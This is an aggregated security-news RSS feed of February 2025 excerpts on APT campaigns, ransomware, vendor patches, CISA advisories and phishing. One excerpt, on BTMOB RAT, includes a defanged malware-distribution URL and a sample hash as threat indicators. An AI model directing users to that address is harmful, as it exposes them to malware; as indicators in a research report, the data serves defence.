www.secnews.physaphae.fr

www.secnews.physaphae.fr This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2025-05-12T09:14:28+00:00 www.secnews.physaphae.fr Cyble - CyberSecurity Firm FBI, CISA Urge Memory-Safe Practices for Software Development

In a strongly worded advisory, the FBI and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have urged software developers to cease unsafe development practices that lead to “unforgivable” buffer overflow vulnerabilities. “Despite the existence of well-documented, effective mitigations for buffer overflow vulnerabilities, many manufacturers continue to use unsafe software development practices that allow these vulnerabilities to persist,” the agencies said in the February 12 Secure By Design alert. “For these reasons-as well as the damage exploitation of these defects can cause-CISA, FBI, and others designate buffer overflow vulnerabilities as unforgivable defects.” The agencies said threat actors leverage buffer overflow vulnerabilities to gain initial access to networks, thus making them a critical point for preventing attacks. We\'ll look at the prevalence of buffer overflow vulnerabilities, some examples cited by CISA and the FBI, and guidance for secure development and use of memory-safe programming languages. Buffer Overflow Vulnerabilities: Prevalence and Examples The FBI-CISA guidance specifically mentions the common software weaknesses CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer), along with stack-based buffer overflows (CWE-121) and heap-based buffer overflows (CWE-122). The phrase “buffer overflow” occurs in 67 of the 1270 vulnerabilities in CISA\'s Known Exploited Vulnerabilities (KEV) catalog, or 5.28% of the KEV database. The words “buffer” and “overflow” occur in 84 of the KEV vulnerabilities (6.6%). CISA and the FBI cited six examples of buffer overflow vulnerabilities in IT products: CVE-2025-21333, a Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege vulnerability CVE-2025-0282, a stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 ]]> 2025-02-14T10:11:29+00:00 https://cyble.com/blog/fbi-cisa-push-for-memory-safe-software-practices/ www.secnews.physaphae.fr/article.php?IdArticle=8648463 False Vulnerability,Threat None 4.0000000000000000 Bleeping Computer - Magazine Américain PostgreSQL flaw exploited as zero-day in BeyondTrust breach Rapid7\'s vulnerability research team says attackers exploited a PostgreSQL security flaw as a zero-day to breach the network of privileged access management company BeyondTrust in December. [...]]]> 2025-02-14T09:15:47+00:00 https://www.bleepingcomputer.com/news/security/postgresql-flaw-exploited-as-zero-day-in-beyondtrust-breach/ www.secnews.physaphae.fr/article.php?IdArticle=8648500 False Vulnerability,Threat None 2.0000000000000000 InformationSecurityBuzzNews - Site de News Securite Espionage Tools Associated with China Used in Ransomware Attacks Espionage actors linked to China may be diversifying their operations, as new evidence points to the use of espionage tools in a recent ransomware attack against a South Asian software and services company. Symantec Threat Intelligence reports that the attack, involving the RA World ransomware, stands out due to the distinct toolset typically associated with [...]]]> 2025-02-14T07:23:48+00:00 https://informationsecuritybuzz.com/espionage-tools-used-in-ransomware-att/ www.secnews.physaphae.fr/article.php?IdArticle=8648453 False Ransomware,Tool,Threat None 3.0000000000000000 Volexity - Cyber Firms Multiple Russian Threat Actors Targeting Microsoft Device Code Authentication KEY TAKEAWAYS Volexity has observed multiple Russian threat actors conducting social-engineering and spear-phishing campaigns targeting organizations with the ultimate goal of compromising Microsoft 365 accounts via Device Code Authentication phishing. Device Code Authentication phishing follows an atypical workflow to that expected by users, meaning users may not recognize it as phishing. Recent campaigns observed have been politically themed, particularly around the new administration in the United States and the changes this might mean for nations around the world. Starting in mid-January 2025, Volexity identified several social-engineering and spear-phishing campaigns by Russian threat actors aimed at compromising Microsoft 365 (M365) accounts. These attack campaigns were highly targeted and carried out in a variety of ways. The majority of these attacks originated via spear-phishing emails with different themes. In one case, the eventual breach began with highly tailored outreach via Signal. Through its investigations, Volexity discovered that Russian threat actors were impersonating […]

>KEY TAKEAWAYS Volexity has observed multiple Russian threat actors conducting social-engineering and spear-phishing campaigns targeting organizations with the ultimate goal of compromising Microsoft 365 accounts via Device Code Authentication phishing. Device Code Authentication phishing follows an atypical workflow to that expected by users, meaning users may not recognize it as phishing. Recent campaigns observed have been politically themed, particularly around the new administration in the United States and the changes this might mean for nations around the world. Starting in mid-January 2025, Volexity identified several social-engineering and spear-phishing campaigns by Russian threat actors aimed at compromising Microsoft 365 (M365) accounts. These attack campaigns were highly targeted and carried out in a variety of ways. The majority of these attacks originated via spear-phishing emails with different themes. In one case, the eventual breach began with highly tailored outreach via Signal. Through its investigations, Volexity discovered that Russian threat actors were impersonating […] ]]> 2025-02-13T22:32:30+00:00 https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/ www.secnews.physaphae.fr/article.php?IdArticle=8648428 False Threat None 3.0000000000000000 Dark Reading - Informationweek Branch Chinese APT \\'Emperor Dragonfly\\' Moonlights With Ransomware Pivoting from prior cyber espionage, the threat group deployed its backdoor tool set to ultimately push out RA World malware, demanding $2 million from its victim.]]> 2025-02-13T21:32:35+00:00 https://www.darkreading.com/cyberattacks-data-breaches/chinese-apt-emperor-dragonfly-ransomware-attack www.secnews.physaphae.fr/article.php?IdArticle=8648423 False Ransomware,Malware,Tool,Threat None 3.0000000000000000 HackRead - Chercher Cyber Microsoft Uncovers \\'BadPilot\\' Campaign as Seashell Blizzard Targets US and UK Russian GRU-linked hackers exploit known software flaws to breach critical networks worldwide, targeting the United States and the…]]> 2025-02-13T21:27:54+00:00 https://hackread.com/microsoft-badpilot-campaign-seashell-blizzard-usa-uk/ www.secnews.physaphae.fr/article.php?IdArticle=8648424 False Threat APT 44 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks A nation-state threat actor with ties to North Korea has been linked to an ongoing campaign targeting South Korean business, government, and cryptocurrency sectors. The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked under the names APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet]]> 2025-02-13T19:56:00+00:00 https://thehackernews.com/2025/02/north-korean-apt43-uses-powershell-and.html www.secnews.physaphae.fr/article.php?IdArticle=8648389 False Threat APT 43 3.0000000000000000 CyberScoop - scoopnewsgroup.com special Cyber Salt Typhoon remains active, hits more telecom networks via Cisco routers The Chinese nation-state threat group intruded five additional telecom networks between December and January, including two unnamed providers in the U.S., Recorded Future researchers said.

>The Chinese nation-state threat group intruded five additional telecom networks between December and January, including two unnamed providers in the U.S., Recorded Future researchers said. ]]> 2025-02-13T19:10:35+00:00 https://cyberscoop.com/salt-typhoon-china-ongoing-telecom-attack-spree/ www.secnews.physaphae.fr/article.php?IdArticle=8648413 False Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) RA World Ransomware Attack in South Asia Links to Chinese Espionage Toolset An RA World ransomware attack in November 2024 targeting an unnamed Asian software and services company involved the use of a malicious tool exclusively used by China-based cyber espionage groups, raising the possibility that the threat actor may be moonlighting as a ransomware player in an individual capacity. "During the attack in late 2024, the attacker deployed a distinct toolset that had]]> 2025-02-13T17:28:00+00:00 https://thehackernews.com/2025/02/hackers-exploited-pan-os-flaw-to-deploy.html www.secnews.physaphae.fr/article.php?IdArticle=8648368 False Ransomware,Tool,Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Palo Alto Networks Patches Authentication Bypass Exploit in PAN-OS Software Palo Alto Networks has addressed a high-severity security flaw in its PAN-OS software that could result in an authentication bypass. The vulnerability, tracked as CVE-2025-0108, carries a CVSS score of 7.8 out of 10.0. The score, however, drops to 5.1 if access to the management interface is restricted to a jump box. "An authentication bypass in the Palo Alto Networks PAN-OS software enables an]]> 2025-02-13T15:09:00+00:00 https://thehackernews.com/2025/02/palo-alto-networks-patches.html www.secnews.physaphae.fr/article.php?IdArticle=8648339 False Vulnerability,Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) FINALDRAFT Malware Exploits Microsoft Graph API for Espionage on Windows and Linux Threat hunters have shed light on a new campaign targeting the foreign ministry of an unnamed South American nation with bespoke malware capable of granting remote access to infected hosts. The activity, detected in November 2024, has been attributed by Elastic Security Labs to a threat cluster it tracks as REF7707. Some of the other targets include a telecommunications entity and a university,]]> 2025-02-13T14:41:00+00:00 https://thehackernews.com/2025/02/finaldraft-malware-exploits-microsoft.html www.secnews.physaphae.fr/article.php?IdArticle=8648331 False Malware,Threat None 3.0000000000000000 Checkpoint - Fabricant Materiel Securite January 2025\\'s Most Wanted Malware: FakeUpdates Continues to Dominate Check Point Software\'s latest threat index highlights that FakeUpdates continues to pose a significant threat in the cyber landscape, playing a crucial role in facilitating ransomware attacks. A recent investigation by security researchers revealed that an affiliate of RansomHub utilized a Python-based backdoor to maintain persistent access and deploy ransomware across various networks. Installed shortly after FakeUpdates gained initial access, this backdoor demonstrated advanced obfuscation techniques along with AI-assisted coding patterns. The attack involved lateral movement through remote desktop protocol (RDP) and established ongoing access by creating scheduled tasks. The advanced techniques highlight an increasing reality: cyber criminals are evolving […]

>Check Point Software\'s latest threat index highlights that FakeUpdates continues to pose a significant threat in the cyber landscape, playing a crucial role in facilitating ransomware attacks. A recent investigation by security researchers revealed that an affiliate of RansomHub utilized a Python-based backdoor to maintain persistent access and deploy ransomware across various networks. Installed shortly after FakeUpdates gained initial access, this backdoor demonstrated advanced obfuscation techniques along with AI-assisted coding patterns. The attack involved lateral movement through remote desktop protocol (RDP) and established ongoing access by creating scheduled tasks. The advanced techniques highlight an increasing reality: cyber criminals are evolving […] ]]> 2025-02-13T13:00:34+00:00 https://blog.checkpoint.com/research/january-2025s-most-wanted-malware-fakeupdates-continues-to-dominate-2/ www.secnews.physaphae.fr/article.php?IdArticle=8648365 False Ransomware,Malware,Threat None 2.0000000000000000 DarkTrace - DarkTrace: AI bases detection Why Darktrace / EMAIL excels against APTs APTs are sophisticated threat actors with the resources to coordinate and achieve long-term objectives. Amidst the skyrocketing numbers of BEC attacks, every organization should be worried about the ability of intruders to infiltrate and exploit. This blog will look at several recent examples of complex email attacks and how Darktrace / EMAIL successfully disarmed and prevented intrusion.]]> 2025-02-13T13:00:01+00:00 https://darktrace.com/blog/why-darktrace-email-excels-against-apts www.secnews.physaphae.fr/article.php?IdArticle=8648358 False Threat None 3.0000000000000000 Cyble - CyberSecurity Firm CISA Updates Known Exploited Vulnerabilities Catalog with Four Critical Issues

Cyble CISA Updates Known Exploited Vulnerabilities Catalog with Four Critical Issues

In a recent update to its Known Exploited Vulnerabilities Catalog, the Cybersecurity and Infrastructure Security Agency (CISA) has added four security vulnerabilities that are currently under active exploitation. These vulnerabilities span across multiple platforms and pose substantial security risks for both organizations and individual users. The vulnerabilities identified in CVE-2024-40891, CVE-2024-40890, CVE-2025-21418, and CVE-2025-21391 can be exploited with relative ease if security updates are not applied promptly. Users and organizations should follow the guidance provided by vendors like Zyxel and Microsoft, ensuring that their systems are updated regularly to address the latest security flaws. For organizations relying on Zyxel DSL routers or Windows-based systems, it is crucial to assess the exposure to these vulnerabilities and take immediate steps to update firmware or software versions. Details of the Vulnerabilities and Active Exploitation CVE-2024-40891 and CVE-2024-40890: Critical Command Injection Vulnerabilities in Zyxel DSL Routers The two vulnerabilities-CVE-2024-40891 and CVE-2024-40890-are related to a series of Command Injection Vulnerabilities affecting Zyxel DSL CPE devices. Specifically, these vulnerabilities affect the Zyxel VMG4325-B10A router model running firmware version 1.00(AAFR.4)C0_20170615. Both vulnerabilities share a common thread: they allow authenticated attackers to execute arbitrary operating system (OS) commands on the affected devices via Telnet (CVE-2024-40891) or a crafted HTTP POST request (CVE-2024-40890). This puts devices at high risk of being compromised by threat actors who can exploit these weaknesses to gain control of the affected systems. According to the official Zyxel advisory, both vulnerabilities have been assigned a CVSS severity score of 8.8 (High). These flaws stem from improper neutralization of special elements used in OS commands (CWE-78: Improper Neutralization of Special Elements used in an OS Command). Once successfully exploited, the vulnerabilities could allow attackers to bypass authentication and execute malicious OS commands, effectively compromising the security of the devices. Zyxel has issued advisories urging users to update their firmware to mitigate these vulnerabilities. Devices using older firmware versions are especially at risk. The active exploitation of these vulnerabilities could lead to severe consequences, such as unauthorized access, ]]> 2025-02-13T11:40:21+00:00 https://cyble.com/blog/cisa-adds-4-critical-vulnerabilities/ www.secnews.physaphae.fr/article.php?IdArticle=8648344 False Vulnerability,Threat None 3.0000000000000000 Cyble - CyberSecurity Firm Cyble Warns of Exposed Medical Imaging, Asset Management Systems

Cyble Warns of Exposed Medical Imaging, Asset Management Systems

Overview Cyble\'s weekly industrial control system (ICS) vulnerability report to clients warned about internet-facing medical imaging and critical infrastructure asset management systems that could be vulnerable to cyberattacks. The report examined six ICS, operational technology (OT), and Supervisory Control and Data Acquisition (SCADA) vulnerabilities in total, but it focused on two in particular after Cyble detected web-exposed instances of the systems. Orthanc, Trimble Cityworks Vulnerabilities Highlighted by CISA The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued advisories alerting users to vulnerabilities in medical imaging and asset management products. Orthanc is an open-source DICOM server used in healthcare environments for medical imaging storage and retrieval, while Trimble Cityworks is a GIS-centric asset management system used to manage all infrastructure assets for airports, utilities, municipalities, and counties. In a February 6 ICS medical advisory, CISA said the Orthanc server prior to version 1.5.8 does not enable basic authentication by default when remote access is enabled, which could result in unauthorized access by a malicious actor. The Missing Authentication for Critical Function vulnerability, CVE-2025-0896, has been assigned a CVSS v3.1 base score of 9.8, just below the maximum score of 10.0. Orthanc recommends that users update to the latest version or enable HTTP authentication by setting the configuration "AuthenticationEnabled": true in the configuration file. Cyble provided a publicly accessible search query for its ODIN vulnerability search tool, which users can use to find potentially vulnerable instances. “This flaw requires urgent attention, as Cyble researchers have identified multiple internet-facing Orthanc instances, increasing the risk of exploitation,” the Cyble report said. “The exposure of vulnerable instances could allow unauthorized access to sensitive medical data, manipulation of imaging records, or even unauthorized control over the server. Given the high stakes in healthcare cybersecurity, immediate patching to version 1.5.8 or later, along with restricting external access, is strongly recommended to mitigate potential threats.]]> 2025-02-13T11:15:54+00:00 https://cyble.com/blog/cyble-warns-of-exposed-medical-imaging-systems/ www.secnews.physaphae.fr/article.php?IdArticle=8648345 True Tool,Vulnerability,Threat,Patching,Industrial,Medical None 3.0000000000000000 Global Security Mag - Site de news francais Cybersécurité : Rapport Threat Intelligence Mimecast 2e semestre 2024 Investigations

Cybersécurité : Rapport Threat Intelligence Mimecast 2e semestre 2024 L\'étude s\'appuie sur plus de 90 milliards de données analysées auprès des 42 000 clients de Mimecast au second semestre 2024. • Plus de 5 milliards de menaces ont été signalées entre juillet et décembre 2024. • Les secteurs du divertissement et de l\'information ont été les plus ciblés par les attaques, avec plus de 10 menaces par utilisateur. • Les cybercriminels utilisent des techniques variées pour mener leurs attaques. Dans ce contexte, les attaques par phishing sont en hausse. • L\'IA reste à la fois un atout et une menace pour la cybersécurité. - Investigations]]> 2025-02-13T09:40:57+00:00 https://www.globalsecuritymag.fr/cybersecurite-rapport-threat-intelligence-mimecast-2e-semestre-2024.html www.secnews.physaphae.fr/article.php?IdArticle=8648333 False Threat,Studies None 4.0000000000000000 Bleeping Computer - Magazine Américain Chinese espionage tools deployed in RA World ransomware attack A China-based threat actor, tracked as Emperor Dragonfly and commonly associated with cybercriminal endeavors, has been observed using in a ransomware attack a toolset previously attributed to espionage actors. [...]]]> 2025-02-13T09:31:54+00:00 https://www.bleepingcomputer.com/news/security/chinese-espionage-tools-deployed-in-ra-world-ransomware-attack/ www.secnews.physaphae.fr/article.php?IdArticle=8648386 False Ransomware,Tool,Threat None 2.0000000000000000 AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC Best Practices for Securing Web Applications Against Modern Threats Enterprise Strategy Group, organizations are anticipating an explosion in web applications, web sites, and associated APIs in the next two years. Research respondents reported they support an average of 145 applications today and are expecting that number to grow to 201 within 24 months. Additionally, the same research shows that organizations with at least half of their applications using APIs will grow from 32% today to 80% within 24 months. This explosive growth is creating a viable attack vector for cybercriminals and more challenges for security teams. Nearly half (46%) of respondents in the ESG research survey said that web application and API protection is more difficult than it was two years ago, citing environmental changes as one of the main challenges. This includes maintaining visibility and security of APIs, using cloud infrastructure, and securing cloud-native architectures. Organizations are increasingly facing diverse attacks as cybercriminals employ various techniques to gain unauthorized access to API endpoints and expose or steal sensitive information. According to ESG’s recent report findings, the top threat vector being exploited is application and API attacks through lesser-known vulnerabilities, with 41% percent of organizations reporting such attacks. Adopting Best Practices for API Security To mitigate the complexities and challenges of today\'s environment, more organizations recognize the importance of API security and are adopting best practices, including seeking assistance from third-party providers. In fact, according to ESG, 45% of organizations plan to work with managed service providers to manage web application and API protection tools. Application and API protection are quickly becoming a fundamental security control, because when left unprotected, APIs provide an easy way to gain unauthorized access to IT networks and disrupt business, steal data, or launch cyberattacks. By adopting security best practices, organizations can mitigate vulnerabilities and other exposures that attackers could potentially exploit and protect APIs from security threats like unauthorized access and data breaches. Identifying Common Risks and Threats To effectively safeguard your APIs, it is crucial to understand the common risks and threats that exist, including: Injection attacks Vulnerability exploits Authentication issues Broken access controls Distributed Denial of service (DDoS) Brute-force attacks API abuse Machine in the middle (MITM) attacks Cross-site scripting (XSS) Use Proactive Defense with Best Practices to Your APIs from Threats Organizations and security teams should understand and implement API security best practices to prevent APIs from being attacked or abused. Secure development Build API security standards and practices into every stage of API development to find vulnerabilities before APIs enter production. Incorporate automated security testing throughout the entire process and run a wide range of tests simulating malicious traffic. Implement strict input validation and sanitization to prevent injection attack]]> 2025-02-13T06:03:00+00:00 https://levelblue.com/blogs/security-essentials/best-practices-securing-web-applications www.secnews.physaphae.fr/article.php?IdArticle=8648384 False Tool,Vulnerability,Threat,Cloud None 2.0000000000000000 InformationSecurityBuzzNews - Site de News Securite Russia-Linked Seashell Blizzard Intensifies Cyber Operations Against Critical Sectors The Russia-linked threat actor known as Seashell Blizzard has assigned one of its subgroups to gain initial access to internet-facing infrastructure and establish long-term persistence within targeted entity, a Microsoft report has revealed. Also dubbed APT44, BlackEnergy Lite, Sandworm, Telebots, and Voodoo Bear, Seashell Blizzard has been active since at least 2009 and is believed [...]]]> 2025-02-13T06:02:16+00:00 https://informationsecuritybuzz.com/russia-linked-seashell-blizzard-intens/ www.secnews.physaphae.fr/article.php?IdArticle=8648314 False Threat APT 44 3.0000000000000000 Cyber Skills - Podcast Cyber Beware of Romance Scams this Valentine\\'s Day As Valentine\'s day approaches, many people are looking to connect with others online. While online dating can be a great way to meet new people, it is also important to be aware of the potential dangers. Romance scams, where fraudsters use fake profiles to financially and emotionally exploit victims are becoming more common. These scammers manipulate their victims into sending money under false pretenses. They often succeed by building trusting relationships over long periods of time. Warning signs of Romance Scams Scammers typically gain trust by showering their target with attention and compliments before eventually asking them for money. They may claim it\'s for travel expenses, medical emergencies (typically of a child), or a business opportunity that would help to bring the relationship closer. Common red flags can include rushing the relationship, avoiding personal questions and refusing to meet in person. They may also try to move conversation off dating platforms to a less secure platform to avoid being detected as a scam. If someone you have met online asks for financial help, it\'s a major warning sign. How to protect yourself Use trusted dating websites with strong security measures Keep personal details private and be cautious when sharing information Never send money or provide financial assistance to someone that you haven\'t met in person. Be careful with your webcams, as scammers often try to exploit video recordings as ransom. Trust your instincts - if something feels off, it probably is. At CyberSkills, We\'re committed to helping people stay safe online. This Valentine\'s Day, protect both your heart and your security and stay safe! An Garda Síochána. (2025). Beware of Romance Scams. Retrieved from https://www.garda.ie/en/crime/fraud/am-i-a-victim-of-a-romance-scam-.html ]]> 2025-02-13T00:00:00+00:00 https://www.cyberskills.ie/explore/news/beware-of-romance-scams-this-valentines-day.html www.secnews.physaphae.fr/article.php?IdArticle=8648356 False Threat,Medical None 3.0000000000000000 Recorded Future - FLux Recorded Future Cybercrime evolving into national security threat: Google “The vast cybercriminal ecosystem has acted as an accelerant for state-sponsored hacking, providing malware, vulnerabilities, and in some cases full-spectrum operations to states,” said Ben Read of Google Threat Intelligence Group.]]> 2025-02-12T22:06:18+00:00 https://therecord.media/cybercrime-evolving-nation-state-threat www.secnews.physaphae.fr/article.php?IdArticle=8648284 False Malware,Vulnerability,Threat None 3.0000000000000000 Techworm - News Microsoft Patches 63 Flaws, Including Two Actively Exploited Zero-Days CVE-2025-21391 (CVSS 7.1) – Windows Storage Elevation of Privilege Vulnerability This Elevation of Privilege (EoP) vulnerability in Windows Storage allows a local, authenticated attacker to delete targeted files on a system. “An attacker would only be able to delete targeted files on a system. This vulnerability does not allow disclosure of any confidential information, but could allow an attacker to delete data that could include data that results in the service being unavailable,” reads Microsoft\'s advisory. No details about how this flaw was exploited in attacks or who reported it have been revealed. CVE-2025-21418 (CVSS 7.8) – Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability The second actively exploited vulnerability allows an attacker to run a crafted program to gain SYSTEM privileges in Windows. It remains unclear how this flaw was exploited in attacks, and Microsoft states that it was disclosed anonymously. Additionally, the other two publicly disclosed zero-days that were patched in the February 2025 Patch Tuesday update are: CVE-2025-21194 (CVSS 7.1) – Microsoft Surface Security Feature Bypass Vulnerability According to Microsoft, this hypervisor flaw allows attackers to bypass UEFI and compromise the secure kernel on Surface devices. It is likely linked to the PixieFail vulnerabilities. “This Hypervisor vulnerability relates to Virtual Machines within a Unified Extensible Firmware Interface (UEFI) host machine. On some specific hardware it might be possible to bypass the UEFI, which could lead to the compromise of the hypervisor and the secure kernel,” explains Microsoft’s advisory. The tech giant credited Francisco Falcón and Iván Arce of Quarkslabfor discovering and reporting the vulnerability. CVE-2025-21377 (CVSS 6.5) – NTLM Hash Disclosure Spoofing Vulnerability This flaw exposes a Windows user’s NTLM hashes, which allows a remote attacker to steal Windows user hashes via minimal file interaction and potentially log in as the user. “Minimal interaction with a malicious file by a user such as selecting (single-click), inspecting (right-click), or performing an action other than opening or executing the file could trigger this vulnerability,” explains Microsoft’s advisory.]]> 2025-02-12T20:18:47+00:00 https://www.techworm.net/2025/02/microsoft-patch-flaws-actively-exploited-zero-days.html www.secnews.physaphae.fr/article.php?IdArticle=8648206 False Vulnerability,Threat None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Researchers Find New Exploit Bypassing Patched NVIDIA Container Toolkit Vulnerability Cybersecurity researchers have discovered a bypass for a now-patched security vulnerability in the NVIDIA Container Toolkit that could be exploited to break out of a container\'s isolation protections and gain complete access to the underlying host. The new vulnerability is being tracked as CVE-2025-23359 (CVSS score: 8.3). It affects the following versions - NVIDIA Container Toolkit (All]]> 2025-02-12T19:34:00+00:00 https://thehackernews.com/2025/02/researchers-find-new-exploit-bypassing.html www.secnews.physaphae.fr/article.php?IdArticle=8648210 False Vulnerability,Threat None 3.0000000000000000 IndustrialCyber - cyber risk firms for industrial Food and Ag-ISAC cyber threat report provides actionable intelligence on cyber threats, ransomware tactics The Food and Ag-ISAC released its latest publication, the Food and Ag Sector Cyber Threat Report, that employs... ]]> 2025-02-12T18:15:38+00:00 https://industrialcyber.co/reports/food-and-ag-isac-cyber-threat-report-provides-actionable-intelligence-on-cyber-threats-ransomware-tactics/ www.secnews.physaphae.fr/article.php?IdArticle=8648252 False Ransomware,Threat None 3.0000000000000000 Bleeping Computer - Magazine Américain zkLend loses $9.5M in crypto heist, asks hacker to return 90% Decentralized money lender zkLend suffered a breach where threat actors exploited a smart contract flaw to steal 3,600 Ethereum, worth $9.5 million at the time. [...]]]> 2025-02-12T18:08:09+00:00 https://www.bleepingcomputer.com/news/cryptocurrency/zklend-loses-95m-in-crypto-heist-asks-hacker-to-return-90-percent/ www.secnews.physaphae.fr/article.php?IdArticle=8648291 False Threat None 3.0000000000000000 CyberScoop - scoopnewsgroup.com special Cyber Russian state threat group shifts focus to US, UK targets A subgroup of Seashell Blizzard exploited public vulnerabilities in internet-facing systems, Microsoft researchers said.

>A subgroup of Seashell Blizzard exploited public vulnerabilities in internet-facing systems, Microsoft researchers said. ]]> 2025-02-12T17:58:47+00:00 https://cyberscoop.com/russian-state-threat-group-shifts-focus/ www.secnews.physaphae.fr/article.php?IdArticle=8648237 False Vulnerability,Threat APT 44 3.0000000000000000 Global Security Mag - Site de news francais Over two-thirds of cybersecurity breaches linked to human error, finds new Mimecast Threat Intelligence Report Special Reports

Over two-thirds of cybersecurity breaches linked to human error, finds new Mimecast Threat Intelligence Report - Special Reports]]> 2025-02-12T17:18:11+00:00 https://www.globalsecuritymag.fr/over-two-thirds-of-cybersecurity-breaches-linked-to-human-error-finds-new.html www.secnews.physaphae.fr/article.php?IdArticle=8648244 False Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) North Korean Hackers Exploit PowerShell Trick to Hijack Devices in New Cyberattack The North Korea-linked threat actor known as Kimsuky has been observed using a new tactic that involves deceiving targets into running PowerShell as an administrator and then instructing them to paste and run malicious code provided by them. "To execute this tactic, the threat actor masquerades as a South Korean government official and over time builds rapport with a target before sending a]]> 2025-02-12T16:13:00+00:00 https://thehackernews.com/2025/02/north-korean-hackers-exploit-powershell.html www.secnews.physaphae.fr/article.php?IdArticle=8648188 False Threat None 3.0000000000000000 Netskope - etskope est une société de logiciels américaine fournissant une plate-forme de sécurité informatique New Phishing Campaign Abuses Webflow, SEO, and Fake CAPTCHAs Summary Netskope Threat Labs is tracking a widespread phishing campaign affecting hundreds of Netskope customers and thousands of users. The campaign aims to steal credit card information to commit financial fraud, and has been ongoing since the second half of 2024. The attacker targets victims searching for documents on search engines, resulting in access to […]

>Summary Netskope Threat Labs is tracking a widespread phishing campaign affecting hundreds of Netskope customers and thousands of users. The campaign aims to steal credit card information to commit financial fraud, and has been ongoing since the second half of 2024. The attacker targets victims searching for documents on search engines, resulting in access to […] ]]> 2025-02-12T15:00:00+00:00 https://www.netskope.com/blog/new-phishing-campaign-abuses-webflow-seo-and-fake-captchas www.secnews.physaphae.fr/article.php?IdArticle=8648207 False Threat None 3.0000000000000000 HackRead - Chercher Cyber Apple Confirms \\'Extremely Sophisticated\\' Exploit Threatening iOS Security Apple fixes the USB Restricted Mode flaw in iOS 18.3.1 and iPadOS 18.3.1. Vulnerability exploited in targeted attacks.…]]> 2025-02-12T13:45:35+00:00 https://hackread.com/apple-extremely-sophisticated-exploit-ios-security/ www.secnews.physaphae.fr/article.php?IdArticle=8648202 False Vulnerability,Threat None 3.0000000000000000 Cyble - CyberSecurity Firm New Zealand\\'s National Cyber Security Centre (NCSC) Reports Surge in Cyber Threats and Vulnerabilities Overview The 2023/24 Cyber Threat Report from New Zealand\'s National Cyber Security Centre (NCSC), led by Lisa Fong, Deputy Director-General for Cyber Security at the Government Communications Security Bureau (GCSB), sheds light on the country\'s rapidly changing cyber threat landscape. The report highlights an increase in cyber incidents targeting individuals, businesses, and critical national sectors, underlining the growing complexity of cyber threats. For the year ending June 2024, the NCSC recorded a whopping total of 7,122 cybersecurity incidents, marking a new milestone since CERT NZ\'s integration into the NCSC. Of these incidents, 95% (6,799) were handled through the NCSC\'s general triage process. These incidents primarily affected small to medium businesses and individual users and resulted in a reported financial loss of $21.6 million. While these incidents did not require specialized technical interventions, they still had a substantial impact on those affected, particularly in terms of financial losses and reputational damage. A smaller subset of incidents, 343 in total, was categorized as having national significance. These incidents were more complex and targeted critical infrastructure or large organizations. Among them, 110 were linked to state-sponsored actors, signaling a slight increase in cyber activities from such groups. Financially motivated cybercriminal activities were responsible for 65 of these high-impact incidents, emphasizing the persistent threat from financially driven attacks such as ransomware and data exfiltration. 2023/24 Cyber Threat Report: State-Sponsored Cyber Threats and Ransomware ]]> 2025-02-12T10:33:38+00:00 https://cyble.com/blog/ncsc-reports-surge-in-cyber-threats-and-vulnerabilities/ www.secnews.physaphae.fr/article.php?IdArticle=8648178 False Ransomware,Tool,Vulnerability,Threat,Technical None 3.0000000000000000 Cyble - CyberSecurity Firm BTMOB RAT: Newly Discovered Android Malware Spreading via Phishing Sites Key Takeaways BTMOB RAT is an advanced Android malware evolved from SpySolr that features remote control, credential theft, and data exfiltration. It spreads via phishing sites impersonating streaming services like iNat TV and fake mining platforms. The malware abuses Android\'s Accessibility Service to unlock devices, log keystrokes, and automate credential theft through injections. It uses WebSocket-based C&C communication for real-time command execution and data theft. BTMOB RAT supports various malicious actions, including live screen sharing, file management, audio recording, and web injections. The Threat Actor (TA) actively markets the malware on Telegram, offering paid licenses and continuous updates, making it an evolving and persistent threat. Overview On January 31, 2025, Cyble Research and Intelligence Labs (CRIL) identified a sample lnat-tv-pro.apk (13341c5171c34d846f6d0859e8c45d8a898eb332da41ab62bcae7519368d2248) being distributed via a phishing site “hxxps://tvipguncelpro[.]com/” impersonating iNat TV - online streaming platform from Turkey posing a serious threat to unsuspecting users.

Figure 1 – Phishing site distributing this malicious APK file

Figure 1 – Phishing site distributing this ma]]> 2025-02-12T10:31:36+00:00 https://cyble.com/blog/btmob-rat-newly-discovered-android-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8648179 False Malware,Tool,Threat,Mobile None 3.0000000000000000 Global Security Mag - Site de news francais DeepTempo announced that it has completed the BNY Ascent Program Business News

